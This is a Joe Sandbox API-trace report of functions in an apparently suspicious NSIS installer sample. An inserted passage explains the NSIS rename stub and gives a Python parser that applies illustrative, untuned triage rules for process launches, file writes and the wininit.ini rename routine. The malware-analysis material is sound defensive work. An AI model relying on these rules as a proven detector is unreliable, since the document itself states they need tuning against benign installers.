• Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
• Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
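Two of the function entries above carry most of the triage signal in this part of the listing: the dialog procedure that switches the cursor to IDC_WAIT (0x7F02), calls ShellExecuteW with the "open" verb and switches back to IDC_ARROW (0x7F00), and the routine that takes GetShortPathNameW output, formats it with wsprintfA and writes a "[Rename]" section to a file through CreateFileW/WriteFile. The string set of that second entry ("[Rename]", "%ls=%ls", "NUL") is the one the NSIS installer stub uses for its rename-via-wininit.ini routine, so on its own it identifies the packaging, not the payload; a benign NSIS-built installer contains the same stub functions. Reading hundreds of such entries by hand is slow, so the following added example (written for this page; not Joe Sandbox code and not part of the report) parses function entries in the format of this listing and applies a few triage rules. The sample text is trimmed from the two entries above; the rule names, the rule logic and the API sets they look for are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function entries trimmed from the report above
# (argument lists shortened, dump-source lines dropped).
SAMPLE = """\
APIs
• LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
• SetCursor.USER32(00000000), ref: 004044CE
• ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
• LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
Strings
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: CB@$Call$N$open
• Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
• Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
APIs
• lstrcpyW.KERNEL32(00425D70,NUL,?,00000000), ref: 00405C18
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000), ref: 00405ACB
• wsprintfA.USER32 ref: 00405C80
• lstrcpyA.KERNEL32(00000000,[Rename],00000000), ref: 00405D02
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]$p]B$peB
• Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
"""

# One "• Func.Module(args), ref: addr" line, optionally marked as a subcall.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>\w+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>\w+)\s*$"
)
# Metadata bullets such as "• Opcode ID: ..." or "• String ID: ...".
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: str                            # call-site address in the dump
    subcall_of: "str | None" = None     # callee address when the call is one level down

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def strings(self):
        """Joe Sandbox joins the referenced strings with '$' in the String ID field."""
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    def api_names(self, include_subcalls=True):
        return {c.func for c in self.calls if include_subcalls or c.subcall_of is None}

def parse_entries(text):
    """Split the listing at each 'APIs' header; collect calls and metadata per function."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()              # the report's indentation carries no meaning
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            cur.calls.append(ApiCall(m.group("func"), m.group("mod"),
                                     args.split(",") if args is not None else [],
                                     m.group("ref"), m.group("sub")))
            continue
        m = META_RE.match(line)
        if m:
            cur.meta[m.group("key")] = m.group("val").strip()
    return entries

# Hypothetical triage rules (assumptions for this example, not Joe Sandbox signatures).
RULES = (
    ("launches-external", lambda e: bool(e.api_names() & {"ShellExecuteW", "CreateProcessW"})),
    ("writes-file", lambda e: {"CreateFileW", "WriteFile"} <= e.api_names()),
    # NSIS stub's rename-via-wininit.ini routine: "[Rename]" section plus "%ls=%ls" lines.
    ("wininit-rename", lambda e: "[Rename]" in e.strings and "%ls=%ls" in e.strings),
)

def triage(entry):
    return [name for name, pred in RULES if pred(entry)]

def index_by_opcode(entries):
    # Opcode ID is the stable key the Similarity block offers for matching across reports.
    return {e.meta["Opcode ID"]: e for e in entries if "Opcode ID" in e.meta}
```

`parse_entries(text)` takes the listing as pasted from the report; subcall lines are kept but tagged with the callee address so `api_names(include_subcalls=False)` can restrict a rule to the function's own calls. The Opcode ID keys returned by `index_by_opcode` are what the report's Similarity block provides for recognising the same stub function in another sample; the rule set is illustrative and would need tuning against benign installers before it is useful as a detection.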
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
• CharNextW.USER32(?,?,?,00000000), ref: 004061F0
• CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
• CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 589700163-2032017099
                                                                                                                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                                  • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                                  • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                                  • String ID: 8$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll
                                                                                                                                                  • API String ID: 1453599865-1025895127
                                                                                                                                                  • Opcode ID: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                                  • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                                  • Opcode Fuzzy Hash: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                                  • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                                  • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                                  • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                                    • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                                  • String ID: 9
                                                                                                                                                  • API String ID: 1149667376-2366072709
                                                                                                                                                  • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                                  • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                                  • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                                  • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3294113728-0
                                                                                                                                                  • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                                  • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                                  • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                                  • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                  • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                  • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                  • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00000327), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• GetMessagePos.USER32 ref: 00404A81
• ScreenToClient.USER32(?,?), ref: 00404A9B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• GetDC.USER32(?), ref: 00401D44
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
• ReleaseDC.USER32(?,00000000), ref: 00401D71
• CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Times New Roman
• API String ID: 3808545654-927190056
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
• wsprintfW.USER32 ref: 00402CD1
• SetWindowTextW.USER32(?,?), ref: 00402CE1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
APIs
• lstrlenW.KERNEL32(?), ref: 10002391
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
• CLSIDFromString.OLE32(?,00000000), ref: 100023BF
• GlobalAlloc.KERNEL32(00000040), ref: 100023DD
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
• GlobalFree.KERNEL32(00000000), ref: 1000241A
Memory Dump Source
• Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_________.jbxd
Similarity
• API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
• String ID:
• API String ID: 3579998418-0
                                                                                                                                                  • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                                  • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                                                  • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                                  • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 100024E1
                                                                                                                                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                                    • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7556FFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2435812281-0
                                                                                                                                                  • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                                  • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                                                  • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                                  • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001AB9
